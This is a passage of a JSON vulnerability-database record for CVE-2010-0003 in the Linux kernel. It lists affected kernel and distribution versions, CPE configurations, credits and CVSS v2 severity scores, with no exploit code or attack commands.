      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "hat enterprise linux as 4.8.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "red",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "hat enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "linux enterprise server debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.0"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.3"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "enterprise linux es 4.8.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "hat enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "intuity audix lx r1.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "intuity audix lx sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "message networking",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "37724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.6.32.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Andi Kleen",
    "sources": [
      {
        "db": "BID",
        "id": "37724"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2010-0003",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "impactScore": 7.8,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 5.4,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2010-0003",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "id": "VHN-42608",
            "impactScore": 7.8,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-0003",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201001-262",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42608",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2010-0003",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
